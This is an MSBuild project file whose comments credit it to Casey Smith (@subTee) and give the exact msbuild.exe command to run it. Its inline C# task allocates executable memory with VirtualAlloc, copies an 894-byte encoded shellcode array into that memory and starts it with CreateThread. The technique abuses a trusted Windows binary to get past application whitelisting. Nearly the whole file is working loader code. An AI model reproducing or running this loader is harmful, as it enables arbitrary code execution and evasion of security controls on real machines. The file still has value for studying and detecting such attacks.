<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes shellcode. -->
  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
  <!-- Save This File And Execute The Above Command -->
  <!-- Author: Casey Smith, Twitter: @subTee --> 
  <!-- License: BSD 3-Clause -->
  <Target Name="Hello">
    <ClassExample />
  </Target>
  <UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
    
      <Code Type="Class" Language="cs">
      <![CDATA[
        using System;
        using System.Runtime.InteropServices;
        using Microsoft.Build.Framework;
        using Microsoft.Build.Utilities;
        public class ClassExample :  Task, ITask
        {         
          private static UInt32 MEM_COMMIT = 0x1000;          
          private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;          
          [DllImport("kernel32")]
            private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
            UInt32 size, UInt32 flAllocationType, UInt32 flProtect);          
          [DllImport("kernel32")]
            private static extern IntPtr CreateThread(            
            UInt32 lpThreadAttributes,
            UInt32 dwStackSize,
            UInt32 lpStartAddress,
            IntPtr param,
            UInt32 dwCreationFlags,
            ref UInt32 lpThreadId           
            );
          [DllImport("kernel32")]
            private static extern UInt32 WaitForSingleObject(           
            IntPtr hHandle,
            UInt32 dwMilliseconds
            );          
          public override bool Execute()
          {
            byte[] shellcode = new byte[894] {
	     0xbf,0xe5,0x1c,0xb1,0xe7,0xd9,0xd0,0xd9,0x74,0x24,0xf4,0x5b,0x31,0xc9,0xb1,
	     0xd9,0x31,0x7b,0x15,0x03,0x7b,0x15,0x83,0xc3,0x04,0xe2,0x10,0xc1,0x73,0x3e,
             0xae,0xde,0x87,0x79,0xf2,0x0e,0x3a,0x79,0x50,0x1a,0x73,0xcc,0xb7,0xdf,0x69,
             0xd3,0x06,0xa2,0x7e,0x2f,0x96,0x20,0x31,0xd9,0x27,0x4c,0xb9,0x89,0x1f,0x21,
             0x88,0x43,0xe9,0x55,0xad,0x18,0x12,0x17,0x26,0x97,0x4a,0x20,0x02,0x75,0x90,
             0x0a,0x7c,0xef,0x0f,0xc6,0x30,0xd8,0x7e,0x86,0x60,0xe8,0xbd,0x02,0x57,0x7f,
             0x91,0x29,0x70,0x2a,0x5d,0x3a,0x96,0x55,0x54,0xbd,0xf3,0x93,0x2a,0x4a,0x6b,
             0x25,0x77,0x9a,0x14,0x8a,0xfa,0x6f,0x74,0xbc,0xdf,0x98,0x6b,0x6e,0xb5,0x8f,
             0x92,0xd6,0xae,0x9a,0x71,0x52,0x28,0x22,0x1b,0x0f,0xbe,0x3a,0x9a,0xbe,0x0e,
             0xec,0x8f,0x32,0x01,0xfb,0x21,0xc0,0xa2,0xf1,0x49,0xf2,0x21,0x3b,0xb4,0x66,
             0xff,0xf9,0x19,0x61,0x35,0xfe,0x1b,0x2a,0xb6,0x40,0x03,0x7e,0x72,0x38,0x5b,
             0x3d,0xb9,0xb2,0x8c,0x77,0x6c,0x93,0xef,0xe1,0xe5,0x41,0x2f,0x15,0xcc,0x29,
             0xc1,0xa3,0xc3,0x44,0x6c,0x34,0x55,0xd7,0xb1,0x86,0xa1,0x9e,0x08,0x16,0x1e,
             0xec,0x1b,0xbe,0x30,0xa1,0x35,0xf0,0xe9,0x96,0xac,0x7c,0xe6,0x79,0x27,0xa5,
             0x90,0xd2,0x58,0xf5,0xc2,0xa0,0xd7,0x0e,0xb0,0x41,0x84,0xcf,0x41,0x1f,0x7d,
             0x8b,0x44,0xaf,0x38,0xb0,0x51,0xac,0xde,0x74,0x47,0xef,0x37,0xdb,0xcb,0xc7,
             0x82,0x6a,0x60,0x57,0xc5,0xcc,0x8f,0x34,0x9b,0x5a,0x2e,0x6f,0x62,0x24,0xe7,
             0xd7,0x90,0x5f,0x41,0x61,0x14,0xf1,0xfb,0x3f,0x57,0xe9,0x40,0xb4,0x16,0x5f,
             0x24,0xea,0x2b,0x75,0x12,0x8f,0x8c,0xd8,0x5c,0xfa,0x70,0x9b,0x3d,0xe6,0x1c,
             0x75,0x43,0xda,0xd1,0xac,0xfa,0x57,0x1c,0xb4,0xd5,0x9d,0x03,0x07,0xa5,0x7b,
             0x63,0x79,0x65,0xc6,0xde,0xa5,0x1a,0x9d,0xea,0xe2,0x23,0x84,0x33,0x8c,0xc7,
             0x8a,0x99,0xc3,0x7f,0x04,0xa7,0x9f,0xac,0x23,0x00,0x93,0x4c,0x8b,0x01,0x55,
             0x63,0x2d,0xf2,0x79,0xa1,0xe6,0x63,0x5c,0xdb,0xc7,0x57,0x02,0xba,0x06,0x5b,
             0xf7,0x2a,0x9b,0x29,0x52,0xc1,0x0f,0xdc,0x7d,0x2b,0x9d,0x80,0xdc,0xb2,0xde,
             0x80,0x33,0xe9,0xa4,0x88,0xca,0xe8,0xa5,0xdb,0xbf,0xd2,0xf3,0x48,0x92,0x60,
             0x9a,0xb8,0xb2,0xc3,0xe9,0x33,0x60,0x10,0x00,0xdb,0xe7,0x28,0x91,0x06,0x83,
             0xa0,0x9b,0x8c,0x8a,0x91,0x50,0x15,0xfe,0xd1,0xf4,0x47,0x43,0x7f,0x5a,0x98,
             0x63,0x24,0xbd,0xc7,0xc6,0x9b,0xc7,0x36,0x0d,0x32,0xe7,0xee,0x01,0xc5,0x02,
             0xf6,0xa4,0xe5,0x79,0xc2,0xf4,0x1e,0xce,0xba,0x43,0x35,0x3d,0xc3,0x04,0xdd,
             0xc8,0xa7,0xc0,0xf3,0x23,0xa2,0x9f,0xcf,0x33,0xb4,0x6d,0x1d,0x9d,0x3e,0x9c,
	     0xce,0x65,0xd2,0xa1,0xb9,0x67,0xb4,0xe2,0x0a,0xea,0xac,0x6e,0xb0,0x1a,0x11,
	     0xb6,0x01,0x16,0x66,0x6e,0xa2,0x58,0x4f,0xa7,0xe4,0xb6,0x4f,0x23,0xf0,0x7f,
	     0x37,0x61,0x4c,0x6f,0xfd,0xff,0x93,0xd0,0x4c,0x9b,0x8d,0x4c,0xae,0x15,0xa5,
	     0xcf,0x61,0xb8,0x85,0x6a,0x1b,0xcb,0x72,0xe5,0x19,0x41,0xb8,0x41,0x67,0x73,
	     0xa7,0xdd,0xce,0x14,0x84,0x27,0xae,0xa9,0x30,0xce,0xcf,0x3e,0xc3,0x25,0x07,
             0xc0,0xf3,0xd6,0x49,0xaf,0xb2,0x71,0x1c,0xaf,0xfa,0x3e,0x96,0x6e,0xcb,0x90,
             0x56,0x6c,0xae,0x08,0xc6,0x2a,0x33,0xc6,0xd6,0xfb,0x0f,0x6c,0x37,0xe6,0xbc,
             0x33,0xd5,0x6e,0xd2,0x14,0x9a,0xc9,0x2c,0x79,0x38,0xd9,0x9c,0xea,0xa0,0x17,
             0x60,0xa3,0xdd,0xc3,0x4b,0x07,0xc0,0x41,0xa5,0xd2,0x23,0x76,0xff,0xa8,0x05,
             0x05,0x9a,0xf4,0x67,0xc5,0x61,0xfd,0x97,0xc0,0x0d,0x25,0x2e,0x93,0xdb,0x02,
             0x7e,0xdf,0xf2,0x77,0x45,0xb0,0x9b,0xb6,0xb7,0x18,0xa5,0xa8,0xdc,0x37,0xfc,
             0x6d,0xe1,0x6a,0xfb,0x15,0xc7,0x0e,0xe6,0x72,0x3e,0x7b,0xd6,0xc8,0x2c,0x0f,
             0x0c,0x68,0xb5,0xde,0x88,0x30,0x4a,0xa4,0x7b,0xbf,0xed,0x1f,0xda,0x21,0x40,
             0x44,0x3f,0xa8,0x7b,0x61,0xae,0x15,0xb8,0xbe,0xd6,0xc0,0x0f,0xd2,0x7e,0x3a,
             0x50,0x2a,0x94,0x80,0xb0,0x1a,0x5a,0x88,0x80,0x58,0xf4,0x83,0xd5,0x47,0xe1,
             0x96,0x23,0x29,0x91,0xfd,0xd9,0xbc,0x42,0x1e,0x05,0x0f,0x5e,0x49,0xd9,0x12,
             0x0a,0xd3,0x5a,0xc0,0x2d,0x2e,0x3f,0xf6,0xab,0x38,0xdc,0x5d,0x01,0x98,0x85,
             0x14,0xd3,0xb9,0xf9,0xe9,0x2e,0x7d,0xc6,0x33,0x95,0x61,0xd6,0x4b,0xdc,0x7e,
             0x25,0x75,0x00,0xf9,0x98,0xbf,0xc3,0xb6,0x65,0xaf,0xb5,0x7f,0x5a,0x67,0x7c,
             0x29,0x68,0xbf,0x2e,0x50,0x80,0x0e,0xe2,0x26,0xb9,0xfa,0xa1,0x85,0x46,0xb4,
             0xf9,0xd1,0xe6,0xae,0x60,0xf3,0x65,0xd5,0x68,0x6d,0xdf,0xa2,0x1f,0xa8,0x2d,
             0xba,0x01,0x85,0x48,0x21,0x2f,0x5d,0x17,0x0e,0xd0,0xb4,0xd1,0x58,0x4b,0x39,
             0xdd,0x99,0xa4,0xdb,0xb2,0x4d,0x3b,0xf6,0xb5,0x4b,0x6b,0x10,0x7d,0xe0,0xa2,
             0xa9,0x0b,0xa3,0x2e,0xcb,0x3e,0x91,0x69,0x55,0x8a,0x44,0x10,0x11,0xe5,0xdd,
             0x6c,0x8e,0x76,0x3e,0x84,0x63,0x5f,0x0a,0xfe,0x8b,0xa3,0x4e,0x46,0xd5,0x9f,
             0x46,0x3c,0xae,0x6f,0x2e,0xdb,0x18,0xdd,0x91,0xc7,0xfb,0x3e,0x22,0x9a,0x0c,
             0xf8,0x97,0xe2,0xd1,0x11,0x86,0xdc,0x5c,0x2c,0xaf,0x61,0xae,0x60,0x6a,0x55,
             0xf2,0xd8,0x27,0xa4,0x92,0x90,0xe6,0xb0,0x8f,0xda,0xe6,0xf2,0x4b,0x7c,0x0e,
             0xf5,0x0a,0x52,0xfe,0x9f,0x2e,0xfb,0x74,0x7f,0x8d,0xcc,0x08,0x9c,0x12,0x3f,
             0xfb,0x90,0x28,0xc1,0x9f,0x0f,0x47,0x15,0x41 }; 
              UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
                MEM_COMMIT, PAGE_EXECUTE_READWRITE);
              Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
              IntPtr hThread = IntPtr.Zero;
              UInt32 threadId = 0;
              IntPtr pinfo = IntPtr.Zero;
              hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
              WaitForSingleObject(hThread, 0xFFFFFFFF);
              return true;
          } 
        }     
      ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

